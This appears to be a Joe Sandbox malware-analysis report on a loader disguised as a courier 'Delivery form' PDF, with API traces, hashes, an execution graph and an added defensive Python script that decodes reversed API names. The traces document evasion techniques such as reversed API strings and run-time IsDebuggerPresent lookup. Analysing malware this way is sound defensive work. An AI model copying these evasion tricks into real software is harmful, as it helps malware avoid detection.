                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$HandleModule
                                                                                          • String ID: Kernel32$sserddAcorPteG
                                                                                          • API String ID: 667068680-1372893251
                                                                                          • Opcode ID: fc8da97974fc9a5d8ee5fc6ae1ce4bf10c55deea838a03e0081882954fe584a4
                                                                                          • Instruction ID: 034680710fcd563c7af5b29d8574988ed39e34a70b69789319583fb4da10e24c
                                                                                          • Opcode Fuzzy Hash: fc8da97974fc9a5d8ee5fc6ae1ce4bf10c55deea838a03e0081882954fe584a4
                                                                                          • Instruction Fuzzy Hash: 9E014F75A44308AFEB06EFA8DC42E9E77FEFBCD750F524865F40497640DA30A9108A64
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0293AA6F,?,?,00000000), ref: 0293A9F0
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0293AA6F,?,?,00000000), ref: 0293AA20
                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A924,00000000,00000000,00000004), ref: 0293AA2B
                                                                                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0293AA6F,?,?,00000000), ref: 0293AA49
                                                                                          • EnumCalendarInfoA.KERNEL32(Function_0000A960,00000000,00000000,00000003), ref: 0293AA54
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread$CalendarEnum
                                                                                          • String ID:
                                                                                          • API String ID: 4102113445-0
                                                                                          • Opcode ID: ec2c3050e7bf59eb3bf0e98c7767106ba9bb0b8cc351c780677205efcb2515c4
                                                                                          • Instruction ID: 499d29a5d9ba8f844b0a6db19a3e2ecdede8fa2cc22f083b6c5bb54eb83da7cf
                                                                                          • Opcode Fuzzy Hash: ec2c3050e7bf59eb3bf0e98c7767106ba9bb0b8cc351c780677205efcb2515c4
                                                                                          • Instruction Fuzzy Hash: CE0126326002487FF703E7B4CD12B6E739EDBC2724F914160F641E66C0D6249E008AA8
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0293AC58,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0293AAB7
                                                                                            • Part of subcall function 0293A74C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0293A76A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoThread
                                                                                          • String ID: eeee$ggg$yyyy
                                                                                          • API String ID: 4232894706-1253427255
                                                                                          • Opcode ID: e4f8301f381125c258c116f2c04711ded6e57756f25d7adb28f2c643a6cd88fc
                                                                                          • Instruction ID: b60507d764675b412ec7f9c6b8292ee182d02f8feb2bae8d7ba7837ef578ef30
                                                                                          • Opcode Fuzzy Hash: e4f8301f381125c258c116f2c04711ded6e57756f25d7adb28f2c643a6cd88fc
                                                                                          • Instruction Fuzzy Hash: 7D41D3757046054BD713AB6988902BFB3FBEBC6304B555A6AE4E2C7344E638DD06CA22
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc
                                                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                          • API String ID: 1883125708-1952140341
                                                                                          • Opcode ID: 56a291d3b0c4b57a95bb46f04cc71b3e0afaedecbd55a20ccdf5ddc69092ab3c
                                                                                          • Instruction ID: 29dedce0a2cbafd5129916eec961096ad2f4803fc9cb4d5f0f83facffb6025af
                                                                                          • Opcode Fuzzy Hash: 56a291d3b0c4b57a95bb46f04cc71b3e0afaedecbd55a20ccdf5ddc69092ab3c
                                                                                          • Instruction Fuzzy Hash: CEF06D31654308BFEB11EFA8DC42DAE77ADFB89B50B924960F40493A10EA30BD108A65
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,0294EF98,UacInitialize,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize), ref: 0294EB9A
                                                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EBAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmp
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: IsDebuggerPresent$KernelBase
                                                                                          • API String ID: 1646373207-2367923768
                                                                                          • Opcode ID: da062269347050f655cc873a7019fe0baee5052efd694070b7e6ae81c208afc3
                                                                                          • Instruction ID: a0dc53d4107049d6c409a5148857de6c14a2057c04442190b8d941faebe45cce
                                                                                          • Opcode Fuzzy Hash: da062269347050f655cc873a7019fe0baee5052efd694070b7e6ae81c208afc3
                                                                                          • Instruction Fuzzy Hash: 50D08CA2B65B142EFA0276F50CC4C1F02CDA9C557E3301FBDF0A3D20E2EEAAC8121514
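                                                                                          The two GetModuleHandle/GetProcAddress entries above carry the strings "sserddAcorPteG" and "AeldnaHeludoMteG", which are "GetProcAddress" and "GetModuleHandleA" written backwards, and the entry directly above resolves IsDebuggerPresent from KernelBase by name at run time. The script below is an added triage example, not Joe Sandbox output and not code from the sample: it runs offline over a constructed list of the strings shown in these function entries, decodes reversed export names against an allow-list, flags anti-debug exports resolved by name, and separates out the Delphi RTL markers (Borland\Delphi\RTL, "Runtime error at"), which identify the compiler rather than anything malicious. The export allow-list and the sample string list are assumptions of the example; a real run would feed it the output of strings or FLOSS over the dumped region and the full kernel32/kernelbase/ntdll export tables.

```python
"""Triage of the string artifacts listed in this report.

Added example: this is not Joe Sandbox output and not code from the sample.
It works offline on a constructed list of the strings shown in the function
entries above and flags two patterns a reverser would want surfaced:
  * Win32 export names stored reversed ("sserddAcorPteG" -> "GetProcAddress")
  * anti-debugging exports resolved by name at run time (IsDebuggerPresent)
It also notes the Delphi RTL markers, which only identify the compiler.
"""
import re

# Constructed input: strings taken from the report entries above plus a few
# neutral ones so the filters have to discriminate.
SAMPLE_STRINGS = [
    "Kernel32",
    "sserddAcorPteG",
    "KernelBASE",
    "AeldnaHeludoMteG",
    "KernelBase",
    "IsDebuggerPresent",
    "GetDiskFreeSpaceExA",
    "SOFTWARE\\Borland\\Delphi\\RTL",
    "FPUMaskValue",
    "Runtime error at 00000000",
    "eeee",
]

# Export allow-list used to recognise reversed names. An assumption of the
# example: a production script would load the real kernel32/kernelbase/ntdll
# export tables instead of this hand-picked subset.
KNOWN_APIS = {
    "GetProcAddress", "GetModuleHandleA", "GetModuleHandleW",
    "LoadLibraryA", "LoadLibraryW", "VirtualAlloc", "VirtualAllocEx",
    "WriteProcessMemory", "CreateRemoteThread", "QueueUserAPC",
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
    "NtUnmapViewOfSection", "GetDiskFreeSpaceExA",
}

# Exports whose run-time resolution is a classic anti-analysis indicator.
ANTI_DEBUG_APIS = {
    "IsDebuggerPresent", "CheckRemoteDebuggerPresent",
    "NtQueryInformationProcess",
}

# Delphi RTL artifacts: a compiler fingerprint, not malicious on their own.
DELPHI_MARKERS = re.compile(r"Borland\\Delphi\\RTL|^Runtime error at ", re.I)


def decode_reversed_api(s: str):
    """Return the export name if `s` is a known export written backwards."""
    candidate = s[::-1]
    return candidate if candidate in KNOWN_APIS else None


def classify_strings(strings):
    """Group dump strings into the indicator classes described above."""
    result = {"reversed_apis": {}, "anti_debug": [], "delphi_rtl": False}
    for s in strings:
        decoded = decode_reversed_api(s)
        if decoded:
            result["reversed_apis"][s] = decoded
            # A reversed anti-debug name is still an anti-debug reference.
            if decoded in ANTI_DEBUG_APIS:
                result["anti_debug"].append(decoded)
        elif s in ANTI_DEBUG_APIS:
            result["anti_debug"].append(s)
        elif DELPHI_MARKERS.search(s):
            result["delphi_rtl"] = True
    return result


if __name__ == "__main__":
    report = classify_strings(SAMPLE_STRINGS)
    for obf, clear in report["reversed_apis"].items():
        print(f"reversed API string: {obf!r} -> {clear}")
    for api in report["anti_debug"]:
        print(f"anti-debug API resolved by name: {api}")
    if report["delphi_rtl"]:
        print("Delphi RTL markers present (compiler fingerprint only)")
```

                                                                                          Reversed strings defeat naive import-name matching because the plaintext API name never appears in the binary; the decode step is cheap, so it is worth running on every dumped string, not just on the ones an analyst already suspects. The Delphi markers are deliberately kept out of the verdict: they are the same strings any Delphi application ships, so they help attribute the loader family only when combined with the other indicators.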
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0295C10B,00000000,0295C11E), ref: 0293C402
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0293C413
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                          • API String ID: 1646373207-3712701948
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0293E21F
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0293E23B
                                                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0293E2B2
                                                                                          • VariantClear.OLEAUT32(?), ref: 0293E2DB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                          • String ID:
                                                                                          • API String ID: 920484758-0
                                                                                          APIs
                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3990497365-0
                                                                                          APIs
                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0293ACE1
                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0293AD05
                                                                                          • GetModuleFileNameA.KERNEL32(02930000,?,00000105), ref: 0293AD20
                                                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0293ADB6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3990497365-0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          APIs
                                                                                          • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02939562), ref: 029394FA
                                                                                          • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02939562), ref: 02939500
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: DateFormatLocaleThread
                                                                                          • String ID: yyyy
                                                                                          • API String ID: 3303714858-3145165042
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02948216), ref: 029481F8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                          • String ID: FlushInstructionCache$Kernel32
                                                                                          • API String ID: 3811539418-184458249
                                                                                          APIs
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294AD98
                                                                                          • IsBadWritePtr.KERNEL32(?,00000004), ref: 0294ADC8
                                                                                          • IsBadReadPtr.KERNEL32(?,00000008), ref: 0294ADE7
                                                                                          • IsBadReadPtr.KERNEL32(?,00000004), ref: 0294ADF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: Read$Write
                                                                                          • String ID:
                                                                                          • API String ID: 3448952669-0

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.2%
                                                                                          Dynamic/Decrypted Code Coverage:4.4%
                                                                                          Signature Coverage:4.4%
                                                                                          Total number of Nodes:137
                                                                                          Total number of Limit Nodes:11
                                                                                          execution_graph
                                                                                          • 92264 425143
                                                                                          • 92269 42515c
                                                                                          • 92264->92269
                                                                                          • 92265 4251e9
                                                                                          • 92266 4251a4
                                                                                          • 92272 42ebe3
                                                                                          • 92266->92272
                                                                                          • 92269->92265
                                                                                          • 92269->92266
                                                                                          • 92270 4251e4
                                                                                          • 92269->92270
                                                                                          • 92271 42ebe3 RtlFreeHeap
                                                                                          • 92270->92271
                                                                                          • 92271->92265
                                                                                          • 92275 42ce73
                                                                                          • 92272->92275
                                                                                          • 92274 4251b4
                                                                                          • 92276 42ce90
                                                                                          • 92275->92276
                                                                                          • 92277 42cea1 RtlFreeHeap
                                                                                          • 92276->92277
                                                                                          • 92277->92274
                                                                                          • 92278 42fce3
                                                                                          • 92279 42ebe3 RtlFreeHeap
                                                                                          • 92278->92279
                                                                                          • 92280 42fcf8
                                                                                          • 92279->92280
                                                                                          • 92281 42fc83
                                                                                          • 92282 42fc93
                                                                                          • 92281->92282
                                                                                          • 92283 42fc99
                                                                                          • 92281->92283
                                                                                          • 92286 42ecc3
                                                                                          • 92283->92286
                                                                                          • 92285 42fcbf
                                                                                          • 92289 42ce23
                                                                                          • 92286->92289
                                                                                          • 92288 42ecde
                                                                                          • 92288->92285
                                                                                          • 92290 42ce40
                                                                                          • 92289->92290
                                                                                          • 92291 42ce51 RtlAllocateHeap
                                                                                          • 92290->92291
                                                                                          • 92291->92288
                                                                                          • 92292 424da3
                                                                                          • 92293 424dbf
                                                                                          • 92292->92293
                                                                                          • 92294 424de7
                                                                                          • 92293->92294
                                                                                          • 92295 424dfb
                                                                                          • 92293->92295
                                                                                          • 92296 42cb13 NtClose
                                                                                          • 92294->92296
                                                                                          • 92302 42cb13
                                                                                          • 92295->92302
                                                                                          • 92298 424df0
                                                                                          • 92296->92298
                                                                                          • 92299 424e04
                                                                                          • 92305 42ed03 RtlAllocateHeap
                                                                                          • 92299->92305
                                                                                          • 92301 424e0f
                                                                                          • 92303 42cb30
                                                                                          • 92302->92303
                                                                                          • 92304 42cb41 NtClose
                                                                                          • 92303->92304
                                                                                          • 92304->92299
                                                                                          • 92305->92301
                                                                                          • 92338 42c0f3
                                                                                          • 92339 42c110
                                                                                          • 92338->92339
                                                                                          • 92342 2a082df0 LdrInitializeThunk
                                                                                          • 92339->92342
                                                                                          • 92340 42c138
                                                                                          • 92342->92340
                                                                                          • 92306 41a903
                                                                                          • 92307 41a975
                                                                                          • 92306->92307
                                                                                          • 92308 41a91b
                                                                                          • 92306->92308
                                                                                          • 92308->92307
                                                                                          • 92310 41e873
                                                                                          • 92308->92310
                                                                                          • 92311 41e899
                                                                                          • 92310->92311
                                                                                          • 92315 41e996
                                                                                          • 92311->92315
                                                                                          • 92316 42fd23 RtlAllocateHeap RtlFreeHeap
                                                                                          • 92311->92316
                                                                                          • 92313 41e934
                                                                                          • 92313->92315
                                                                                          • 92317 42c143
                                                                                          • 92313->92317
                                                                                          • 92315->92307
                                                                                          • 92316->92313
                                                                                          • 92318 42c15d
                                                                                          • 92317->92318
                                                                                          • 92321 2a082c0a
                                                                                          • 92318->92321
                                                                                          • 92319 42c189
                                                                                          • 92319->92315
                                                                                          • 92322 2a082c1f LdrInitializeThunk
                                                                                          • 92321->92322
                                                                                          • 92323 2a082c11
                                                                                          • 92321->92323
                                                                                          • 92322->92319
                                                                                          • 92323->92319
                                                                                          • 92324 414083
                                                                                          • 92326 4140a9
                                                                                          • 92324->92326
                                                                                          • 92325 4140d3
                                                                                          • 92326->92325
                                                                                          • 92328 413e03 LdrInitializeThunk
                                                                                          • 92326->92328
                                                                                          • 92328->92325
                                                                                          • 92329 4191a3
                                                                                          • 92330 4191d3
                                                                                          • 92329->92330
                                                                                          • 92332 4191ff
                                                                                          • 92330->92332
                                                                                          • 92333 41b673
                                                                                          • 92330->92333
                                                                                          • 92334 41b6b7
                                                                                          • 92333->92334
                                                                                          • 92335 41b6d8
                                                                                          • 92334->92335
                                                                                          • 92336 42cb13 NtClose
                                                                                          • 92334->92336
                                                                                          • 92335->92330
                                                                                          • 92336->92335
                                                                                          • 92348 414373
                                                                                          • 92349 41438c
                                                                                          • 92348->92349
                                                                                          • 92354 417b33
                                                                                          • 92349->92354
                                                                                          • 92351 4143aa
                                                                                          • 92352 4143f6
                                                                                          • 92351->92352
                                                                                          • 92353 4143e3 PostThreadMessageW
                                                                                          • 92351->92353
                                                                                          • 92353->92352
                                                                                          • 92356 417b57
                                                                                          • 92354->92356
                                                                                          • 92355 417b5e
                                                                                          • 92355->92351
                                                                                          • 92356->92355
                                                                                          • 92357 417b7d
                                                                                          • 92356->92357
                                                                                          • 92361 430063 LdrLoadDll
                                                                                          • 92356->92361
                                                                                          • 92359 417b93 LdrLoadDll
                                                                                          • 92357->92359
                                                                                          • 92360 417baa
                                                                                          • 92357->92360
                                                                                          • 92359->92360
                                                                                          • 92360->92351
                                                                                          • 92361->92357
                                                                                          • 92362 401af2
                                                                                          • 92363 401b20
                                                                                          • 92362->92363
                                                                                          • 92363->92363
                                                                                          • 92364 401bf3 EntryPoint
                                                                                          • 92363->92364
                                                                                          • 92365 401c20
                                                                                          • 92364->92365
                                                                                          • 92368 430153
                                                                                          • 92365->92368
                                                                                          • 92371 42e793
                                                                                          • 92368->92371
                                                                                          • 92372 42e7b9
                                                                                          • 92371->92372
                                                                                          • 92383 4075c3
                                                                                          • 92372->92383
                                                                                          • 92374 42e7cf
                                                                                          • 92382 401c2a
                                                                                          • 92374->92382
                                                                                          • 92386 41b483
                                                                                          • 92374->92386
                                                                                          • 92376 42e7ee
                                                                                          • 92377 42e803
                                                                                          • 92376->92377
                                                                                          • 92401 42cec3
                                                                                          • 92376->92401
                                                                                          • 92397 428683
                                                                                          • 92377->92397
                                                                                          • 92380 42e81d
                                                                                          • 92381 42cec3 ExitProcess
                                                                                          • 92380->92381
                                                                                          • 92381->92382
                                                                                          • 92404 4167e3
                                                                                          • 92383->92404
                                                                                          • 92385 4075d0
                                                                                          • 92385->92374
                                                                                          • 92387 41b4af
                                                                                          • 92386->92387
                                                                                          • 92415 41b373
                                                                                          • 92387->92415
                                                                                          • 92390 41b4f4
                                                                                          • 92393 41b510
                                                                                          • 92390->92393
                                                                                          • 92395 42cb13 NtClose
                                                                                          • 92390->92395
                                                                                          • 92391 41b4dc
                                                                                          • 92392 41b4e7
                                                                                          • 92391->92392
                                                                                          • 92394 42cb13 NtClose
                                                                                          • 92391->92394
                                                                                          • 92392->92376
                                                                                          • 92393->92376
                                                                                          • 92394->92392
                                                                                          • 92396 41b506
                                                                                          • 92395->92396
                                                                                          • 92396->92376
                                                                                          • 92399 4286e4
                                                                                          • 92397->92399
                                                                                          • 92398 4286f1
                                                                                          • 92398->92380
                                                                                          • 92399->92398
                                                                                          • 92426 4189a3
                                                                                          • 92399->92426
                                                                                          • 92402 42cee0
                                                                                          • 92401->92402
                                                                                          • 92403 42cef1 ExitProcess
                                                                                          • 92402->92403
                                                                                          • 92403->92377
                                                                                          • 92405 416800
                                                                                          • 92404->92405
                                                                                          • 92407 416819
                                                                                          • 92405->92407
                                                                                          • 92408 42d573
                                                                                          • 92405->92408
                                                                                          • 92407->92385
                                                                                          • 92410 42d58d
                                                                                          • 92408->92410
                                                                                          • 92409 42d5bc
                                                                                          • 92409->92407
                                                                                          • 92410->92409
                                                                                          • 92411 42c143 LdrInitializeThunk
                                                                                          • 92410->92411
                                                                                          • 92412 42d61c
                                                                                          • 92411->92412
                                                                                          • 92413 42ebe3 RtlFreeHeap
                                                                                          • 92412->92413
                                                                                          • 92414 42d635
                                                                                          • 92413->92414
                                                                                          • 92414->92407
                                                                                          • 92416 41b38d
                                                                                          • 92415->92416
                                                                                          • 92420 41b469
                                                                                          • 92415->92420
                                                                                          • 92421 42c1e3
                                                                                          • 92416->92421
                                                                                          • 92419 42cb13 NtClose
                                                                                          • 92419->92420
                                                                                          • 92420->92390
                                                                                          • 92420->92391
                                                                                          • 92422 42c1fd
                                                                                          • 92421->92422
                                                                                          • 92425 2a0835c0 LdrInitializeThunk
                                                                                          • 92422->92425
                                                                                          • 92423 41b45d
                                                                                          • 92423->92419
                                                                                          • 92425->92423
                                                                                          • 92427 4189cd
                                                                                          • 92426->92427
                                                                                          • 92433 418edb
                                                                                          • 92427->92433
                                                                                          • 92434 413fe3
                                                                                          • 92427->92434
                                                                                          • 92429 418afa
                                                                                          • 92430 42ebe3 RtlFreeHeap
                                                                                          • 92429->92430
                                                                                          • 92429->92433
                                                                                          • 92431 418b12
                                                                                          • 92430->92431
                                                                                          • 92432 42cec3 ExitProcess
                                                                                          • 92431->92432
                                                                                          • 92431->92433
                                                                                          • 92432->92433
                                                                                          • 92433->92398
                                                                                          • 92436 414003
                                                                                          • 92434->92436
                                                                                          • 92437 41406c
                                                                                          • 92436->92437
                                                                                          • 92439 41b793 RtlFreeHeap LdrInitializeThunk
                                                                                          • 92436->92439
                                                                                          • 92437->92429
                                                                                          • 92438 414062
                                                                                          • 92438->92429
                                                                                          • 92439->92438
                                                                                          • 92337 2a082b60 LdrInitializeThunk
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000001.1773094379.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
